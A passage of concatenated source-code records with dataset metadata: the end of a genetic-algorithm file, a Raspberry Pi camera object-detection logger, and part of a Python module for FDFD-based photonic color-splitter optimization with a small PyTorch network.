4)\n i2 = random.randint(0, 4)\n section_copy[i1], section_copy[i2] = section_copy[i2], section_copy[i1] \n self.genes[start:end] = section_copy\n","sub_path":"GA/Einstein_s riddle/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"637566311","text":"import argparse\r\nimport datetime as dt\r\nimport time\r\nimport picamera\r\nimport json\r\n\r\nfrom detect import detect_from_image\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-i\", \"--interval\", type=int, default=1, help=\"interval in minutes to take photographs for object detection\")\r\nap.add_argument(\"-s\", \"--start\", type=float, default=0, help=\"minutes before camera to begin\")\r\nap.add_argument(\"-e\", \"--end\", type=float, default=None, help=\"minutes to run the camera\")\r\nap.add_argument(\"-d\", \"--dir\", type=str, default=\"logs/\", help=\"directory to store log of objects\")\r\nap.add_argument(\"--vflip\", action=\"store_true\", help=\"flip images taken from camera vertically\")\r\nap.add_argument(\"--hflip\", action=\"store_true\", help=\"flip images taken from camera horizontally\")\r\n\r\nargs = vars(ap.parse_args())\r\n\r\nTEMP_FILE_NAME = \"temp.jpg\"\r\n\r\ndef setup_camera(vflip, hflip):\r\n camera = picamera.PiCamera()\r\n camera.vflip = vflip\r\n camera.hflip = hflip\r\n return camera\r\n\r\ndef track(camera, interval, start, end, directory):\r\n if start > 0:\r\n print(\"Starting in\", start, \"minutes\")\r\n time.sleep(start*60)\r\n\r\n if end is not None:\r\n end_time = dt.datetime.now() + dt.timedelta(minutes=end)\r\n print(\"Running until {}\".format(end_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n else:\r\n end_time = dt.datetime.max\r\n\r\n print(\"Starting...\")\r\n while dt.datetime.now() < end_time:\r\n camera.capture(TEMP_FILE_NAME)\r\n objects = detect_from_image(TEMP_FILE_NAME)\r\n file_name = '{}/{}.json'.format(directory, dt.datetime.now().strftime(\"%Y.%m.%d_%H.%M.%S\"))\r\n\r\n with open(file_name, 'w') as fp:\r\n json.dump(objects, fp)\r\n \r\n time.sleep(interval*60) #interval is given in minutes, like --start and --end\r\n\r\nif __name__ == \"__main__\":\r\n camera = setup_camera(vflip=args[\"vflip\"], hflip=args[\"hflip\"])\r\n track(camera=camera, interval=args[\"interval\"], start=args[\"start\"], end=args[\"end\"], directory=args[\"dir\"])\r\n\r\n","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"603603780","text":"#\n# System\n#\nimport sys\nimport os\n\n#\n# Math\n#\nimport numpy as np\nimport scipy.optimize\n\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import RectBivariateSpline\n\nsys.path.insert(1, '../')\nimport heaviside\n\n#\n# Learning\n#\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#\n# Electromagnetics\n#\nrun_on_cluster = True\n\nif run_on_cluster:\n\tsys.path.append( '/central/home/gdrobert/Develompent/ceviche' )\nimport ceviche\n\n#\n# Topology Optimization\n#\npython_src_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\nsys.path.append( os.path.abspath( python_src_directory + \"/../LevelSet/\" ) )\nif run_on_cluster:\n\tfrom LevelSet import LevelSet\nelse:\n\timport LevelSet\n\nsys.path.append( os.path.abspath( python_src_directory + \"/../\" ) )\nimport sigmoid\n\n\n\neps_nought = 8.854 * 1e-12\nmu_nought = 1.257 * 1e-6 \nc = 3.0 * 1e8\nsmall = 1e-10\n\n\n\nclass PermittivityPredictor(nn.Module):\n\tdef __init__(self, num_lambda, kernel_size):\n\t\tsuper(PermittivityPredictor, self).__init__()\n\n\t\tnum_fields = 2 * num_lambda\n\t\tnum_channels = 1 + num_fields\n\t\tself.kernel_size = kernel_size\n\n\t\tself.conv1 = nn.Conv2d( num_channels, num_channels, self.kernel_size, padding=1 )\n\t\tself.conv2 = nn.Conv2d( num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv3 = nn.Conv2d( 2 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv4 = nn.Conv2d( 2 * num_channels, 4 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv5 = nn.Conv2d( 4 * num_channels, 4 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv6 = nn.Conv2d( 4 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv7 = nn.Conv2d( 2 * num_channels, 2 * num_channels, self.kernel_size, padding=1 )\n\t\tself.conv8 = nn.Conv2d( 2 * num_channels, num_channels, self.kernel_size, padding=1 )\n\n\t\tself.conv9 = nn.Conv2d( num_channels, 2, self.kernel_size, padding=1 )\n\n\t\tself.pool = nn.MaxPool2d( 2, 2 )\n\t\tself.upsample = nn.Upsample( scale_factor=2, mode='bilinear' )\n\n\t\tself.softmax = nn.Softmax( 1 )\n\n\tdef forward(self, x):\n\t\tx = F.relu( self.conv1( x ) )\n\t\tx = self.pool( F.relu( self.conv2( x ) ) )\n\n\t\tx = F.relu( self.conv3( x ) )\n\t\tx
= self.pool( F.relu( self.conv4( x ) ) )\n\n\t\tx = F.relu( self.conv5( x ) )\n\t\tx = self.upsample( F.relu( self.conv6( x ) ) )\n\n\t\tx = F.relu( self.conv7( x ) )\n\t\tx = self.upsample( F.relu( self.conv8( x ) ) )\n\n\t\tx = self.softmax( self.conv9( x ) )\n\n\t\treturn x\n\n\n# def compute_binarization( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 2 / np.sqrt( total_shape ) ) * np.sqrt( np.sum( ( input_variable - 0.5 )**2 ) )\n# def compute_binarization_gradient( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 4 / np.sqrt( total_shape ) ) * ( input_variable - 0.5 ) / compute_binarization( input_variable )\n\ndef compute_binarization( input_variable, set_point=0.5 ):\n\ttotal_shape = np.product( input_variable.shape )\n\treturn ( 2. / total_shape ) * np.sum( np.sqrt( ( input_variable - set_point )**2 ) )\n# def compute_binarization_gradient( input_variable ):\n# \ttotal_shape = np.product( input_variable.shape )\n# \treturn ( 1. / total_shape ) * ( input_variable - 0.5 ) / np.sum( np.sqrt( ( input_variable - 0.5 )**2 )\t)\n\ndef compute_binarization_gradient( input_variable, set_point=0.5 ):\n\ttotal_shape = np.product( input_variable.shape )\n\treturn ( 2. / total_shape ) * np.sign( input_variable - set_point )\n\n\ndef vector_norm( v_in ):\n\treturn np.sqrt( np.sum( np.abs( v_in )**2 ) )\n\ndef upsample( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k * factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ int( x_idx / factor ), int( y_idx / factor ) ]\n\n\treturn output_block\n\ndef reinterpolate_average( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k / factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tstart_x = int( factor * x_idx )\n\t\tend_x = start_x + factor\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\tstart_y = int( factor * y_idx )\n\t\t\tend_y = start_y + factor\n\n\t\t\taverage = 0.0\n\n\t\t\tfor sweep_x in range( start_x, end_x ):\n\t\t\t\tfor sweep_y in range( start_y, end_y ):\n\t\t\t\t\taverage += ( 1. / factor**2 ) * input_block[ sweep_x, sweep_y ]\n\t\t\t\n\t\t\toutput_block[ x_idx, y_idx ] = average\n\n\treturn output_block\n\n\ndef reinterpolate_abs_max( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k / factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tstart_x = int( factor * x_idx )\n\t\tend_x = start_x + factor\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\tstart_y = int( factor * y_idx )\n\t\t\tend_y = start_y + factor\n\n\t\t\tabs_max = 0.0\n\t\t\tbest_x = 0\n\t\t\tbest_y = 0\n\n\t\t\tfor sweep_x in range( start_x, end_x ):\n\t\t\t\tfor sweep_y in range( start_y, end_y ):\n\t\t\t\t\tget_abs = np.abs( input_block[ sweep_x, sweep_y ] )\n\n\t\t\t\t\tif get_abs > abs_max:\n\t\t\t\t\t\tabs_max = get_abs\n\t\t\t\t\t\tbest_x = sweep_x\n\t\t\t\t\t\tbest_y = sweep_y\n\n\t\t\t\t\t# abs_max = np.maximum( abs_max, get_abs )\n\n\t\t\t\t\t# average += ( 1. 
/ factor**2 ) * input_block[ sweep_x, sweep_y ]\n\t\t\t\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ best_x, best_y ]\n\n\treturn output_block\n\nclass ColorSplittingOptimizationDeep2D():\n\n\tdef __init__( self,\n\t\tdevice_size_voxels, coarsen_factor, mesh_size_nm,\n\t\tpermittivity_bounds, focal_spots_x_relative, focal_length_y_voxels,\n\t\twavelengths_um, wavelength_idx_to_focal_idx, random_seed,\n\t\tnum_layers, designable_layer_indicators, non_designable_permittivity,\n\t\tsave_folder, field_blur=False, field_blur_size_voxels=0.0, density_pairings=None,\n\t\tbinarization_set_point=0.5 ):\n\t\t\n\t\tself.device_width_voxels = device_size_voxels[ 0 ]\n\t\tself.device_height_voxels = device_size_voxels[ 1 ]\n\n\t\tself.coarsen_factor = coarsen_factor\n\t\tassert ( self.device_width_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device width in voxels!\"\n\t\tassert ( self.device_height_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device height in voxels!\"\n\n\t\tself.design_width_voxels = int( device_size_voxels[ 0 ] / coarsen_factor )\n\t\tself.design_height_voxels = int( device_size_voxels[ 1 ] / coarsen_factor )\n\n\t\tself.design_density = None\n\n\t\tself.mesh_size_nm = mesh_size_nm\n\t\tself.mesh_size_um = 1e-3 * mesh_size_nm\n\t\tself.mesh_size_m = 1e-9 * mesh_size_nm\n\n\t\tself.device_size_um = [ self.mesh_size_um * device_size_voxels[ idx ] for idx in range( 0, len( device_size_voxels ) ) ]\n\n\t\tself.permittivity_bounds = permittivity_bounds\n\t\tself.min_relative_permittivity = permittivity_bounds[ 0 ]\n\t\tself.max_relative_permittivity = permittivity_bounds[ 1 ]\n\n\t\tself.focal_spots_x_relative = focal_spots_x_relative\n\t\tself.focal_length_y_voxels = focal_length_y_voxels\n\t\tself.wavelengths_um = wavelengths_um\n\t\tself.wavelength_intensity_scaling_factor = 1. 
/ ( eps_nought * np.max( self.wavelengths_um )**2 )\n\t\tself.wavelength_intensity_scaling = self.wavelengths_um**2 * self.wavelength_intensity_scaling_factor\n\n\t\tself.num_wavelengths = len( wavelengths_um )\n\n\t\tself.omega_values = 2 * np.pi * c / ( 1e-6 * wavelengths_um )\n\n\t\tself.wavelength_idx_to_focal_idx = wavelength_idx_to_focal_idx\n\n\t\tself.random_seed = random_seed\n\t\tnp.random.seed( self.random_seed )\n\n\t\tself.density_pairings = density_pairings\n\t\tself.do_density_pairings = not ( self.density_pairings is None )\n\n\t\tassert( self.design_height_voxels % num_layers ) == 0, \"Expected the number of layers to evenly divide the design region\"\n\n\t\tself.num_layers = num_layers\n\t\tself.design_voxels_per_layer = int( self.design_height_voxels / num_layers )\n\n\t\tassert ( len( designable_layer_indicators ) == self.num_layers ), \"The layer designability indicator length does not make sense!\"\n\t\tassert ( len( non_designable_permittivity ) == len( designable_layer_indicators ) ), \"Expected a different length for the non designable permittivity \"\n\n\t\tself.designable_layer_indicators = np.array( designable_layer_indicators )\n\t\tself.non_designable_permittivity = np.array( non_designable_permittivity )\n\t\tself.non_designable_density = ( self.non_designable_permittivity - self.min_relative_permittivity ) / ( self.max_relative_permittivity - self.min_relative_permittivity )\n\n\t\tself.save_folder = save_folder\n\n\t\tself.field_blur = field_blur\n\t\tself.field_blur_size_voxels = field_blur_size_voxels\n\n\t\tself.binarization_set_point = binarization_set_point\n\n\t\tself.setup_simulation()\n\n\tdef init_density_with_random( self, mean_density, sigma_density ):\n\t\tnum_random_values = self.design_width_voxels * self.num_layers\n\n\t\trandom_array_normal_distribution = np.random.normal(\n\t\t\tloc=mean_density,\n\t\t\tscale=sigma_density, size=[ num_random_values ] )\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tfill_data = self.non_designable_density[ layer_idx ] * np.ones( self.design_width_voxels )\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tfill_data = random_array_normal_distribution[ random_values_start : random_values_end ]\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = fill_data\n\n\t\tself.design_density = np.maximum( 0, np.minimum( self.design_density, 1 ) )\n\n\t\tif self.do_density_pairings:\n\t\t\tself.design_density = self.pair_array( self.design_density )\n\n\tdef init_density_with_uniform( self, density_value ):\n\t\tassert ( ( density_value <= 1.0 ) and ( density_value >= 0.0 ) ), \"Invalid density value specified!\"\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tchoose_density = 
self.non_designable_density[ layer_idx ]\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tchoose_density = density_value\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = choose_density\n\n\tdef init_density_directly( self, input_density ):\n\t\tassert ( ( input_density.shape[ 0 ] == self.design_width_voxels ) and ( input_density.shape[ 1 ] == self.design_height_voxels ) ), \"Specified design has the wrong shape\"\n\n\t\tself.design_density = input_density.copy()\n\n\tdef init_density_with_this_class( self, this_class ):\n\t\tself.init_density_directly( this_class.design_density )\n\n\tdef setup_simulation( self ):\n\t\tself.width_gap_voxels = int( 1.0 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\t\tself.height_gap_voxels_top = int( 1.5 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\t\tself.height_gap_voxels_bottom = self.width_gap_voxels\n\t\tself.pml_voxels = int( 1.0 * np.max( self.wavelengths_um ) / self.mesh_size_um )\n\n\t\tself.simulation_width_voxels = self.device_width_voxels + 2 * self.width_gap_voxels + 2 * self.pml_voxels\n\t\tself.simulation_height_voxels = self.device_height_voxels + np.maximum( self.focal_length_y_voxels, 0 ) + self.height_gap_voxels_bottom + self.height_gap_voxels_top + 2 * self.pml_voxels\n\n\t\tself.device_width_start = int( 0.5 * ( self.simulation_width_voxels - self.device_width_voxels ) )\n\t\tself.device_width_end = self.device_width_start + self.device_width_voxels\n\t\tself.device_height_start = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) )\n\t\tself.device_height_end = self.device_height_start + self.device_height_voxels\n\n\t\tself.focal_spots_x_voxels = [\n\t\t\tint( self.device_width_start + self.focal_spots_x_relative[ idx ] * self.device_width_voxels ) for idx in range( 0, len( self.focal_spots_x_relative ) )\n\t\t]\n\n\t\tself.fwd_src_y = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) + self.device_height_voxels + 0.75 * self.height_gap_voxels_top )\n\t\tself.focal_point_y = int( self.pml_voxels + self.height_gap_voxels_bottom - np.minimum( self.focal_length_y_voxels, 0 ) )\n\n\t\tself.rel_eps_simulation = np.ones( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\n\t\tfwd_src_x_range = np.arange( 0, self.simulation_width_voxels )\n\t\tfwd_src_y_range = self.fwd_src_y * np.ones( fwd_src_x_range.shape, dtype=int )\n\n\t\tself.fwd_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tself.fwd_source[ fwd_src_x_range, fwd_src_y_range ] = 1\n\n\tdef plot_geometry( self, opt_mask=None ):\n\t\timport matplotlib.pyplot as plt\n\n\t\tfocal_y = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\tfocal_y[\n\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 5,\n\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 1\n\n\t\tdevice_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tdevice_region[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = 1\n\n\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\tdevice_region[\n\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 
5,\n\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 2\n\n\n\t\tplt.subplot( 2, 2, 1 )\n\t\tplt.imshow( np.real( self.fwd_source ) )\n\t\tplt.title( 'Forward Source' )\n\t\tplt.subplot( 2, 2, 2 )\n\t\tplt.imshow( focal_y )\n\t\tplt.title( 'Focal Y' )\n\t\tplt.subplot( 2, 2, 3 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Device Region' )\n\t\tif opt_mask is not None:\n\t\t\topt_mask_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\t\tupsampled_mask = upsample( opt_mask, self.coarsen_factor )\n\n\t\t\tfor row in range( 0, upsampled_mask.shape[ 0 ] ):\n\t\t\t\tfor col in range( 0, upsampled_mask.shape[ 1 ] ):\n\t\t\t\t\topt_mask_region[ self.device_width_start + row, self.device_height_start + col ] = upsampled_mask[ row, col ]\n\n\t\t\tfor spot in range( 0, len( self.focal_spots_x_voxels ) ):\n\t\t\t\topt_mask_region[\n\t\t\t\t\tself.focal_spots_x_voxels[ spot ] - 5 : self.focal_spots_x_voxels[ spot ] + 5,\n\t\t\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 3\n\n\n\t\t\tplt.subplot( 2, 2, 4 )\n\t\t\tplt.imshow( opt_mask_region )\n\t\t\tplt.title( 'Masked optimization region' )\n\t\tplt.show()\n\n\n\n\tdef plot_subcell_gradient_variations( self, omega_idx, factor ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\tdevice_width_array = np.linspace( 0, 1, self.device_width_voxels )\n\t\tdevice_height_array = np.linspace( 0, 1, self.device_height_voxels )\n\n\t\tinterp_width_array = np.linspace( 0, 1, factor * self.device_width_voxels )\n\t\tinterp_height_array = np.linspace( 0, 1, factor * self.device_height_voxels )\n\n\t\tomega = self.omega_values[ omega_idx ]\n\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\t\n\t\tfocal_point_x_loc = self.focal_spots_x_voxels[ 0 ]\n\n\t\tinterp_spline_fwd_real = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.real( fwd_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\t\tinterp_spline_fwd_imag = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.imag( fwd_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tinterp_spline_adj_real = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.real( adj_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\t\tinterp_spline_adj_imag = RectBivariateSpline(\n\t\t\tdevice_width_array, device_height_array, np.imag( adj_Ez[\n\t\t\t\tself.device_width_start : self.device_width_end,\n\t\t\t\tself.device_height_start : self.device_height_end\n\t\t] ) )\n\n\n\t\tinterpolated_fwd_real = interp_spline_fwd_real( interp_width_array, interp_height_array )\n\t\tinterpolated_adj_real = interp_spline_adj_real( interp_width_array, interp_height_array 
)\n\t\tinterpolated_fwd_imag = interp_spline_fwd_imag( interp_width_array, interp_height_array )\n\t\tinterpolated_adj_imag = interp_spline_adj_imag( interp_width_array, interp_height_array )\n\n\t\tinterpolated_fwd = interpolated_fwd_real + 1j * interpolated_fwd_imag\n\t\tinterpolated_adj = interpolated_adj_real + 1j * interpolated_adj_imag\n\n\t\tinterp_grad = 2 * np.real( interpolated_fwd * interpolated_adj )\n\n\t\taveraged_grad = np.zeros( ( self.device_width_voxels, self.device_height_voxels ) )\n\t\tmiddle_grad = 2 * np.real(\n\t\t\tfwd_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] *\n\t\t\tadj_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] )\n\n\t\tfor x_idx in range( 0, self.device_width_voxels ):\n\t\t\tfor y_idx in range( 0, self.device_height_voxels ):\n\t\t\t\tfor off_x in range( 0, factor ):\n\t\t\t\t\tstart_x = x_idx * factor\n\t\t\t\t\tfor off_y in range( 0, factor ):\n\t\t\t\t\t\tstart_y = y_idx * factor\n\n\t\t\t\t\t\taveraged_grad[ x_idx, y_idx ] += (\n\t\t\t\t\t\t\t( 1. / ( factor * factor ) ) *\n\t\t\t\t\t\t\tinterp_grad[ start_x + off_x, start_y + off_y ]\n\t\t\t\t\t\t)\n\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.imshow( middle_grad, cmap='Blues' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.imshow( averaged_grad, cmap='Blues' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.imshow( ( middle_grad - averaged_grad ), cmap='Greens' )\n\t\tplt.colorbar()\n\t\tplt.show()\n\n\n\n\n\n\t\thalf_width = int( factor * 0.5 * self.device_width_voxels )\n\t\thalf_height = int( factor * 0.5 * self.device_height_voxels )\n\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.imshow( np.abs( interpolated_fwd[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor) ] ), cmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.imshow( np.abs( interpolated_adj[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor) ] ), cmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.imshow(\n\t\t\tnp.real(\n\t\t\t\tinterpolated_fwd[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor ) ] *\n\t\t\t\tinterpolated_adj[ half_width : ( half_width + self.coarsen_factor * 2 * factor ), half_height : ( half_height + self.coarsen_factor * 2 * factor ) ] ),\n\t\t\tcmap='Reds' )\n\t\tplt.colorbar()\n\t\tplt.show()\n\n\n\tdef get_device_efields( self, omega_idx ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega_values[ omega_idx ], device_permittivity )\n\n\t\treturn Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ], device_permittivity\n\n\tdef plot_fields( self, omega_idx ):\n\t\timport matplotlib.pyplot as plt\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, 
self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega_values[ omega_idx ], device_permittivity )\n\n\t\tplt.subplot( 1, 2, 1 )\n\t\tplt.imshow( np.abs( Ez ), cmap='Blues' )\n\t\tplt.subplot( 1, 2, 2 )\n\t\tplt.imshow( np.real( Ez ), cmap='Greens' )\n\t\tplt.show()\n\n\t\tplt.subplot( 1, 2, 1 )\n\t\tceviche.viz.abs(Ez, outline=self.rel_eps_simulation, ax=plt.gca(), cbar=False)\n\t\tplt.subplot( 1, 2, 2 )\n\t\tplt.imshow( np.flip( np.swapaxes( np.real( self.rel_eps_simulation ), 0, 1 ), axis=0 ), cmap='Greens' )\n\t\tplt.show()\n\n\tdef compute_forward_fields( self, omega, device_permittivity ):\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef eval_loss( self, omega ):\n\t\tprint( self.max_relative_permittivity )\n\t\tself.rel_eps_simulation[ :, : ] = self.max_relative_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef compute_fom( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\treturn fom\n\t\n\tdef compute_fom_and_gradient( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tgradient = fom_scaling * 2 * np.real( omega * eps_nought * fwd_Ez * adj_Ez / 1j )\n\n\t\treturn fom, gradient\n\n\tdef compute_fom_and_gradient_and_fields( self, omega, device_permittivity, focal_point_x_loc, fom_scaling=1.0 ):\n\t\tfwd_Ez = self.compute_forward_fields( omega, device_permittivity )\n\t\tfom = fom_scaling * np.abs( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )**2\n\t\t\n\t\tadj_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tadj_source[ focal_point_x_loc, self.focal_point_y ] = np.conj( fwd_Ez[ focal_point_x_loc, self.focal_point_y ] )\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tadj_Hx, adj_Hy, adj_Ez = simulation.solve( adj_source )\n\n\t\tgradient = fom_scaling * 2 * np.real( omega * eps_nought * fwd_Ez * adj_Ez / 1j )\n\n\t\treturn fom, gradient, fwd_Ez\n\n\tdef compute_net_fom_from_density( self, input_density ):\n\t\tfom_by_wl = []\n\n\t\timport_density = upsample( input_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\tfor wl_idx in 
